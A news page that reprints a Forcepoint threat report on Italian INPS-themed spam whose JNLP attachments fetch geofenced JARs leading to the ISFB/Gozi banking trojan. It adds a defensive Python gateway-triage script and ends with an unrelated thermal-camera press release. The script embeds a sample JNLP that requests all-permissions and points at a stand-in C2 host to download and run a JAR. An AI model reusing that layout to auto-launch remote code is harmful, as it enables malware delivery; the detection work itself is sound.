Java Network Launch Protocol – Another way for distributing Java downloaders

September 10, 2020

NEW DELHI, India – September 10, 2020

Forcepoint X-Labs have recently been monitoring emerging malware distribution campaigns that utilize the Java platform. Java downloaders have been a known threat for quite a while, yet there is at least one unexplored feature of the platform that helps to automate malware download and execution. The Java Network Launch Protocol (JNLP) was intended to be a simple mechanism for starting remote Java applications by double-clicking on the equivalent of a Windows Link file. It is currently being leveraged as a novel way to auto-execute malicious Java files.

What is Java Web Start?

Java Web Start, or the Java Network Launch Protocol (JNLP) as programmers often refer to it, is an XML-based protocol designed for the sole purpose of automatically starting Java applications from a remote location. For that to work, the JNLP file must contain the host address and path of the target Java application package (JAR) to be downloaded and executed. Once the user double-clicks a JNLP file, Java attempts to reach the host described in the XML structure, downloads the specified JAR package and, if successful, executes it. The only prerequisite is that the Java Runtime Environment (JRE) is present on the local PC.

Side note: If you are unsure whether you have Java installed on your machine, you can perform a quick check as per

https://www.java.com/en/download/help/version_manual.xml

If you do, it might be worth flagging to your IT team. We have been warning of the vulnerable nature of Java since at least 2013.

Figure 1 – Example of a benign JNLP file

It is rather obvious that this functionality provides an appealing opportunity for automating the download and execution of a malicious file.

The Italian Job

Malicious spam campaigns utilizing a JNLP attachment, either as-is or inside a ZIP archive, started to appear in recent weeks. The messages appear to come from the INPS (Istituto Nazionale della Previdenza Sociale), the main entity of Italy’s public retirement system. Interestingly, the INPS website was itself attacked in early 2020 as Italian citizens started to apply for benefits; this time the organization’s name is being used as a lure, such is its relevance.

Figure 2 – Example of a spammed out fake INPS email

The email encourages recipients to check their balance and claim a refund by opening the attachment. The INPS logo is included; however, a closer look at the sender address, the clumsily written message body and the attachment makes it easy to see that the message is suspicious. Opening the JNLP attachment in a text editor clearly reveals the first-stage C2 address.

Figure 3 – Example of a malicious JNLP file

First stage

Visiting the remote location from anything but an Italian IP address results in the server ignoring the request. Together with the exclusively Italian message body and the .it destination email addresses, this indicates the use of geofencing. Visiting the C2 address from the right location results in the download of a small JAR application, around 6 KB in size. Upon further inspection, this JAR package contains only one Java class, which is unusual for a benign Java application. Decompiling the Java bytecode yields a short piece of source code containing yet another suspicious-looking remote location and the official website of the INPS. The latter acts as a decoy: it is opened in a browser while “nazionale.jpg” is silently downloaded and executed in the background.

Figure 4 – Example of the decompiled Java Class

Second stage

The second stage C2 contains the final payload in the chain and is also geofenced. Successful download of the “nazionale.jpg” file will only occur if it was requested from an accepted geolocation. Note that in certain cases the content of the “nazionale.jpg” file was later replaced by a benign PuTTY telnet client application before the C2 would become unresponsive – likely the result of a takedown operation.

The payloads

The binaries we’ve seen deployed on the second-stage C2 have so far been of two kinds: either an NSIS archive with a single embedded file, which the NSIS script loads directly into memory and executes, or a small executable wrapped in a custom exepacker. What they have in common is that both distribute one of the popular banking trojans, ISFB IAP, a well-known Gozi fork.

Small scale campaigns

There have been only a handful of small-scale campaigns utilizing JNLP files, each with fewer than a thousand email messages and with attributes that change frequently. The attachments of the INPS-themed emails were quickly altered: within a couple of days they reverted from JNLP files to documents with Excel 4.0 macros. In June, Trustwave noted a COVID-19-themed lure pushing TrickBot, and we recently observed yet another, completely different JNLP-based campaign pushing the NetWire RAT. These frequent changes simply reflect the common TTPs of the threat actors behind these campaigns.

Conclusion

Having autostart functionality in popular applications or platforms doesn’t necessarily mean it is safe to use or was created with security in mind. Most likely it just hasn’t been explored and exploited by cybercriminals yet. The Web Start feature of Java is a perfect example: it has been waiting silently to be revisited by cybercriminals many years after its first malicious use in 2013. Organizations, unless they heavily rely on it, are advised to block JNLP file attachments at the gateway level to prevent unwanted execution and its consequences.
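As an added example (not code from the Forcepoint write-up), the following Python triage helper covers the JNLP mechanism described under "What is Java Web Start?", the as-is or ZIP-wrapped attachments seen in the campaign, and the gateway blocking advised above: it shows what a mail-gateway check can recover from a JNLP before Java ever runs it, namely the JAR URLs it would fetch, the hosts it would contact, and whether it requests all-permissions. The sample JNLP, the filenames and the host are constructed placeholders, not indicators from the campaign.

```python
import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urljoin, urlparse

# Constructed sample in the layout a JNLP needs to launch a remote JAR; the host is a placeholder.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="http://c2.example.invalid/images/" href="Rimborso.jnlp">
  <security><all-permissions/></security>
  <resources><j2se version="1.6+"/><jar href="Rimborso.jar" main="true"/></resources>
  <application-desc main-class="Main"/>
</jnlp>"""

_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("Rimborso.jnlp", SAMPLE_JNLP)
SAMPLE_ZIP = _buf.getvalue()  # constructed: the same JNLP inside a ZIP, the other attachment form seen


def looks_like_jnlp(data: bytes) -> bool:
    """Content sniff: XML whose root element is <jnlp>, whatever the file extension says."""
    try:
        return ET.fromstring(data).tag == "jnlp"
    except ET.ParseError:
        return False


def launch_targets(data: bytes) -> dict:
    """What Web Start would do on double-click: which JARs it fetches, from which hosts, with what rights."""
    root = ET.fromstring(data)
    codebase = root.get("codebase", "")  # relative <jar href> values resolve against this
    jars = [urljoin(codebase, j.get("href", "")) for j in root.iter("jar")]
    return {
        "jars": jars,
        "hosts": sorted({urlparse(u).hostname for u in jars if urlparse(u).hostname}),
        "all_permissions": root.find("security/all-permissions") is not None,
    }


def triage_attachment(name: str, data: bytes) -> list:
    """Gateway-style check: flag JNLP attachments sent as-is or wrapped in a ZIP archive."""
    findings = []
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                findings += triage_attachment(f"{name}:{member}", zf.read(member))
    elif name.lower().endswith(".jnlp") or looks_like_jnlp(data):
        t = launch_targets(data)
        findings.append((name, t["hosts"], t["all_permissions"]))
    return findings
```

Each finding names the attachment (with the ZIP member path where applicable), the hosts Java would contact and whether the file asks for full permissions, which is enough to block or quarantine at the gateway without executing anything.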

Protection Statement

Forcepoint customers are protected against this threat at the following stages of attack:

Stage 2 (Lure) – Malicious emails associated with these attacks are identified and blocked.

Stage 5 (Dropper File) – Malicious files are prevented from being downloaded.

Stage 6 (Call Home) – Attempts to contact C2 servers are blocked.

IOCs



iValue in Association with Pixuate and Mobotix Unveil Combat COVID Solution in Government of Karnataka’s Elevate Program

September 10, 2020

Pixuate’s Thermal Solution has been identified under the Combat Covid-19 Innovation Challenge announced by the Karnataka Government at the beginning of the pandemic, paving the way for a healthier world in the current and post-Covid-19 era.

BENGALURU, India – September 10, 2020

iValue InfoSolutions, India’s premium technology enabler, Pixuate, an artificial intelligence-based video analytics company, and Mobotix, a pioneer in the video security industry, came together on September 9, 2020 at the Government of Karnataka’s Elevate Program, held at Vidhana Soudha (Karnataka Vidhana Sabha building) and the Bangalore Bioinnovation Centre, to unveil a Thermal Solution primarily intended to combat Covid-19. The innovations were unveiled by Deputy Chief Minister of Karnataka Dr. Ashwathnarayan.

“The thermal solution is developed by using Pixuate’s Intelligent Thermal Analytics Solutions which accurately identifies heat signatures of people and sends instant alerts for all instances of elevated temperature in humans with the help of the feed that comes from Mobotix’s M16B camera which is a stereo camera with optical as well as thermal lens that is used to detect the face, match the region of the face in thermal feed and record highest temperature of the forehead/eye region. This will aid in the current fight against Covid-19 and any such pandemic situations the world may face in the future,” said Venkatesh R, Co-Founder and Head – Enterprise Channel Management at iValue InfoSolutions.

The solution unveiled is built around Face Recognition, Automatic Number Plate Recognition, Gear Detection that includes helmet, face mask, gloves, shoes, Gesture Recognition like hand waving, Perimeter Security like loitering, tailgating, unauthorized personnel and other relevant video analytics software programs.

The thermal solution is primarily developed for situations like the Covid-19 pandemic and can detect multiple people with elevated body temperature in crowded and/or public environments such as malls, bus stands and railway stations, which are mass movement areas. The software detects up to 30 people in a single frame with a temperature detection accuracy of +/-0.2 degrees Celsius and a detection time of ~1 second. The other use of the thermal solution is to facilitate contactless entry to office premises using facial recognition based biometrics and to cross-verify fever symptoms. This helps with social distance compliance, face recognition and mask detection.

Pixuate which is an artificial intelligence based video analytics company headquartered at Bengaluru has been recognized and supported by the Technology Development Board, Government of India’s nodal agency and also awarded as a winner of Elevate Program by Government of Karnataka.

Prathvi Palekar, Founder and CEO of Pixuate says “For the post-COVID world, we launched thermal analytics that offers end to end automation for offices and public places to check compliance for COVID situation. This software is built on Pixuate’s proprietary deep learning based facial recognition engine and it can provide multiple analytics for a single camera feed such as temperature, mask check, social distance check and facial recognition. Along with Thermal Analytics, Pixuate also offers a suite of analytics for automation and surveillance intelligence such as contactless attendance, campus security and city surveillance.

We are excited to have signed up iValue as a distributor for SAARC and Africa region, and expand to the market beyond our current presence in India and UAE.”

Mobotix, a pioneer in the video security industry, has a fleet of both indoor and outdoor cameras that are thermal, IP-based video systems. The company regards its video systems as computers with lenses that work intelligently and have embedded storage capacity, engineered the German way, which is appreciated as being particularly innovative and of high quality. Mobotix video systems have been optimized for remote applications and cloud-based technology because the cameras can reduce the bandwidth of the video by scaling the size and the frame rate.

This new technology, a collaboration between iValue, Pixuate and Mobotix, will help governments and organizations across the world by giving them a chance not just to fight pandemic situations in the future but also to fight crime, aid forensic investigations and find missing people, among other benefits.

# # #

About iValue InfoSolutions:

A premium technology enabler, iValue InfoSolutions drives “Go to Market” for Niche, Compelling and Complimentary offerings, “Digital Assets” Protection, Optimization & Transformation area, leveraging Customer Life Cycle and Product Life Cycle Adoption frameworks.

iValue mission is to optimize, protect & transform “Digital Assets” of Organizations, with leading edge & proven offerings, in collaboration with trusted partners. iValue offerings are aligned, customized & optimized for organizations, across vertical & size, through its OEM, consultant & global, national, regional and local system integrators partnership.

iValue has a direct partnership with 35+ “Best of Breed” OEMs with 7,000+ Customers through 700+ partners. iValue has a direct presence across 13+ locations in multiple continents, with channel, solution, vertical & horizontal focused teams, addressing the pre-sales, sales & post-sales needs of customers, consultants & partners for Private, Public and Hybrid cloud needs. Apart from India, iValue’s overseas presence includes a Nairobi, Kenya office for its Africa foray.

The team at iValue leverages Analytics for its structured and targeted business development at Customers, along with an AI-driven CRM solution for ensuring profitable growth for its partners and OEMs. iValue has been growing consistently at 4+ times market growth rates, at 50%+ CAGR for the last 12+ years.

For more information, visit iValue and follow us on LinkedIn and Twitter.

About Pixuate:

Pixuate is a deep-tech video analytics company offering advanced deep learning and AI technologies. Founded in 2015, Pixuate is registered as Cocoslabs Innovative Solutions Pvt. Ltd., with cutting edge R&D in the area of computer vision, machine learning & AI. Pixuate’s video analytics platform offers solutions like Face Recognition, License Plate Recognition, Thermal Analytics for security and surveillance. During the COVID-19 pandemic, Pixuate’s thermal analytics solutions have been widely sought after by the Governments and Corporates for mass temperature detection of people at public places and offices.

For more information, visit Pixuate.

About MOBOTIX AG:

MOBOTIX is a leading manufacturer of premium-quality intelligent IP video systems, setting standards for innovative camera technologies and decentralized security solutions with the highest level of cybersecurity and GDPR compliance. MOBOTIX was founded in 1999 and is based in Langmeil, Germany. The company conducts its own research and development, and manufactures its own products with the guarantee of excellence attached to “Made in Germany.” Other sales offices are located in New York, Dubai, Sydney, Paris and Madrid. Customers worldwide trust in the durability and reliability of MOBOTIX hardware and software. The flexibility, built-in intelligence and unparalleled data security of the company’s solutions are valued in many industries. MOBOTIX products and solutions help customers in industries such as industrial manufacturing, retail, logistics, and healthcare. With strong international technology partnerships, the company is expanding its universal platform and new applications in a wide variety of areas through the use of artificial intelligence and deep learning modules. For more information, visit MOBOTIX AG.

